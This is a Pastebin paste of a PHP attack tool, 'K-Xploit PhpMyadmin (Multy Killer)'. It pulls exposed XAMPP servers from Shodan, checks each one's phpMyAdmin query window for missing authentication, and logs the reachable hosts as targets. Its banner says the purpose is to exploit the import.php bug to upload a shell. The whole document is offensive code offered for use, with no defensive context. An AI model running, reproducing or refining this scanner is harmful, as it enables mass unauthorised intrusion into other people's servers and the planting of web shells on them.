API tools faq
paste
Advertisement
shor7cut

K-Xploit PhpMyadmin (Multy Killer)

shor7cut
Jul 25th, 2015
762
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 7.03 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. error_reporting(0);
  3. set_time_limit(0);
  4. date_default_timezone_set('asia/jakarta');
  5.  cover();
  6.  echo "\r\n--------------------------------------\r\n";
  7.  echo "[!] Pleas [ENTER] for next and CTRL+C for abort";
  8. $in = chop(fgets(STDIN));
  9. if(!$in){
  10.     cari_target();
  11. }
  12.  
  13.  
  14. function cari_target() {
  15. unlink("target_shor7cut.txt");
  16. echo "[!] Set output extension [TXT/HTML] : ";
  17. $ext = chop(fgets(STDIN));
  18. echo "\r\n";
  19. if($ext=="HTML"){
  20.     $extension = ".html";
  21. }else if($ext=="TXT"){
  22.     $extension = ".txt";
  23. }else if($ext){
  24.     quit();
  25. }if($ext==""){
  26.     quit();
  27. }
  28. $name_output = "K-exploit-".date("d-m-Y@his").$extension;
  29.  
  30.  
  31.  
  32.  
  33.     // SETTING \\
  34. $no=1;
  35. $nos=1;
  36. $success=0;
  37. $fail=0;
  38. $auth=0;
  39. $dbaru=0;
  40. $api = " ";
  41. if($api==""){
  42.     echo "[!] Ops... Get Your api in account.shodan.io\r\n";
  43.      quit();
  44. }
  45. $total_target=0;
  46. // END:SETTING \\
  47. $dork = array (
  48. 'xampp',
  49. 'xampp Apache/2.2.3',
  50. 'xampp Apache/2.2.4',
  51. 'xampp Apache/2.2.6',
  52. 'xampp Apache/2.2.8',
  53. 'xampp Apache/2.2.9',
  54. 'xampp Apache/2.2.11',
  55. 'xampp Apache/2.2.12',
  56. 'xampp Apache/2.2.14',
  57. 'xampp Apache/2.2.17',
  58. 'xampp Apache/2.2.21',
  59. 'xampp Apache/2.4.2',
  60. 'xampp Apache/2.4.3',
  61. 'xampp Apache/2.4.10',
  62. 'xampp Apache/2.4.12',
  63. 'xampp PHP/5.2.1',
  64. 'xampp PHP/5.2.2',
  65. 'xampp PHP/5.2.3',
  66. 'xampp PHP/5.2.4',
  67. 'xampp PHP/5.2.5',
  68. 'xampp PHP/5.2.6',
  69. 'xampp PHP/5.2.8',
  70. 'xampp PHP/5.2.9',
  71. 'xampp PHP/5.3.0',
  72. 'xampp PHP/5.3.1',
  73. 'xampp PHP/5.3.5',
  74. 'xampp PHP/5.3.8',
  75. 'xampp PHP/5.4.4',
  76. 'xampp PHP/5.4.7',
  77. 'xampp PHP/5.4.31',
  78. 'xampp PHP/5.5.15',
  79. 'xampp PHP/5.5.19',
  80. 'xampp PHP/5.6.3',
  81. 'xampp PHP/5.5.24',
  82. 'xampp PHP/5.6.8',
  83. 'xampp PHP/4.4.5',
  84. 'xampp PHP/4.4.6',
  85. 'xampp PHP/4.4.7',
  86. 'xampp PHP/4.4.8',
  87. 'xampp PHP/4.4.9'
  88. );
  89.  
  90. $total_dork = count($dork);
  91.  
  92.  
  93.  
  94. foreach ($dork as $dorks) {
  95.     $noms = "(".$no."/".$total_dork.")";
  96.     echo shell_exec("title Mencari Target $noms");
  97.     echo "(+) Mencari Target : ".$noms."\r\n(+) scanned in ";
  98.     $get = file_get_contents("https://api.shodan.io/shodan/host/search?key={$api}&query={$dorks}");
  99.     $json = json_decode($get,true);
  100.  
  101. foreach ($json['matches'] as $key => $value) {
  102.  
  103.         $fp = fopen("target_shor7cut.txt", 'a+');
  104.         fwrite($fp, $value['ip_str']."|");
  105.         fclose($fp);
  106.  
  107.     } // End Foreach
  108.     $target_live = $json['total'];
  109.         if($target_live>100){
  110.             $target_live=100;
  111.         }
  112.     $total_target=$target_live+$total_target;
  113.     echo round((microtime(true)-$_SERVER['REQUEST_TIME_FLOAT']),2)." Seconds | Found -> ".$target_live." \r\n\n";
  114.     $no++;
  115. }
  116. echo "[+] Total Target : [".$total_target."]\r\n";
  117. $buka_file = fopen("target_shor7cut.txt", "r");
  118. $baca_file = fgets($buka_file);
  119. $target = explode("|", $baca_file);
  120. echo "[+] Memulai Mencari vulnerable\r\n";
  121. echo shell_exec("title Memulai Mencari vulnerable . . . Pleas wait");
  122. loading();
  123. echo "\r\n";
  124. $start = date("d-m-Y h:i:sa");
  125. foreach ($target as $sites) {
  126.     $infos = "Scan : $sites (".$nos."/".$total_target.") - ".$name_output;
  127. echo shell_exec("title $infos");
  128. echo "-> Info : (".$nos."/".$total_target.") | [S:".$success."/F:".$fail."/A:".$auth."] (DB: ".$dbaru.")\r\n";
  129. echo "-> Target : ".$sites."\r\n";
  130. echo "-> PhpMyadmin : ";
  131. $url = "http://$sites/phpmyadmin/querywindow.php";
  132. $phpmyn = curl_init("$url");
  133. curl_setopt($phpmyn, CURLOPT_FAILONERROR, true);
  134. curl_setopt($phpmyn, CURLOPT_FOLLOWLOCATION, true);
  135. curl_setopt($phpmyn, CURLOPT_RETURNTRANSFER, true);
  136. curl_setopt($phpmyn, CURLOPT_CONNECTTIMEOUT ,0);
  137. curl_setopt($phpmyn, CURLOPT_TIMEOUT, 30);
  138. $phpmynresult = curl_exec($phpmyn);
  139. $re = "/<input type=\"hidden\" name=\"token\" value=\"(.*)\"/";
  140. if(preg_match($re, $phpmynresult, $matches)){
  141. if(preg_match_all("/pma_password/", $phpmynresult, $matx)){
  142. echo "Not vulnerable (Auth)\r\n";
  143. $auth++;
  144. }else {
  145. echo "vulnerable\r\n";
  146.        
  147.         if($extension==".html"){
  148.             $hasil_output='<a href="'.$url.'" target=_blank>http://'.$sites.'</a><br>';
  149.         }else {
  150.             $hasil_output="$url\r\n";
  151.         }
  152.        
  153.         //-----------------------------------------------------------------\\
  154.         //--- JIKA ADA TARGET YANG SAMA MAKA DATA TIDAK DI SIMPAN DI DATABASE
  155.         //--- JIKA INGIN MENGHILANGKAN FUNGSI INI SILAHKAN EDIT SENDIRI
  156.         //--- Hapus Script yang sudah saya tandai // START // END
  157.         //--- Ganti dengan Script dibawah ini
  158.         /*
  159.         $fp = fopen($name_output, 'a+');
  160.         fwrite($fp, $hasil_output);
  161.         fclose($fp);
  162.         */
  163.         //-----------------------------------------------------------------\\
  164.  
  165.         //start
  166.         $buka_file = fopen("logs_shor7cut.txt", "r");
  167.         $baca_file = fgets($buka_file);
  168.  
  169.         if(!preg_match("/$url/", $buka_file, $mat)){
  170.  
  171.         $fp = fopen($name_output, 'a+');
  172.         fwrite($fp, $hasil_output);
  173.         fclose($fp);
  174.        
  175.         $fp = fopen("logs_shor7cut.txt", 'a+');
  176.         fwrite($fp, $url)."\r\n";
  177.         fclose($fp);
  178.             echo "-> Save-DB : Telah disimpan\r\n";
  179.             $dbaru++;
  180.         }else {
  181.             echo "-> Save-DB : Sudah ada di db (logs_shor7cut.txt)\r\n";
  182.         }
  183.         //end
  184.        
  185.        
  186. $success++;
  187. }
  188. }else {
  189. echo "Not vulnerable\r\n";
  190. $fail++;
  191. }
  192. echo "-> Check Done in ".round((microtime(true)-$_SERVER['REQUEST_TIME_FLOAT']),2)." Seconds\r\n\n";
  193. $nos++;
  194.  
  195. }
  196. $scan_done = "Scan Done On ".date("d-m-Y h:i:sa")." - ".$name_output;
  197. echo shell_exec("title $scan_done");
  198. echo "\r\n\n---------------------------------------\r\n";
  199. echo "              > LAPORAN AKHIR <\r\n";
  200. echo "\r\n---------------------------------------\r\n";
  201. echo "-> Total Target : ".$total_target."\r\n";
  202. echo "-> Total Success :".$success."\r\n";
  203. echo "-> Total fail :".$fail."\r\n";
  204. echo "-> Total Auth :".$auth."\r\n";
  205. echo "-> Total Target Baru :".$dbaru."\r\n";
  206. echo "-> Output File :".$name_output."\r\n";
  207. echo "-> Start Scan : ".$start."\r\n";
  208. echo "-> End Scan : ".date("d-m-Y h:i:sa");
  209.  
  210.  
  211.  
  212.  
  213.  
  214.  
  215.  
  216.  
  217.  
  218. } // akhir fungsi
  219.  
  220. function loading() {
  221.     echo "-> Pleas wait ";
  222. for ($i=0; $i <3; $i++) {
  223.         echo ".";
  224.         sleep(1);
  225.         echo " ";
  226.         sleep(1);
  227. }   echo "\r\n";
  228.     }
  229.  
  230.  
  231. function cover() {
  232. $shor7cut.="       .---.                                             \r\n";
  233. $shor7cut.="       |---|                                             \r\n";
  234. $shor7cut.="       |---|                                             \r\n";
  235. $shor7cut.="       |---|    > K-Xploit PhpMyadmin (Multy Killer) <   \r\n";
  236. $shor7cut.="   .---^ - ^---.                                         \r\n";
  237. $shor7cut.="   :___________: Code By Shor7cut (Bug7sec Team)         \r\n";
  238. $shor7cut.="      |  |//|                                            \r\n";
  239. $shor7cut.="      |  |//| [DESCRIPTION]                              \r\n";
  240. $shor7cut.="      |  |//| Looking for Target using shodan            \r\n";
  241. $shor7cut.="      |  |//| Then proceed to search                     \r\n";
  242. $shor7cut.="      |  |.-| Phpmyadmin which has the bug import.php    \r\n";
  243. $shor7cut.="      |.-'**| So that we can upload shell                \r\n";
  244. $shor7cut.="       \***/  Through the bug import.php                 \r\n";
  245. $shor7cut.="        \*/                                              \r\n";
  246. $shor7cut.="         V   Thank's : Tuban Cyber Team | IndoXploit | ISD-TEAM    \r\n";
  247. $shor7cut.="             Yogyakarta Black Hat | Suram-Crew \r\n";
  248. echo $shor7cut;
  249. }  
  250. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!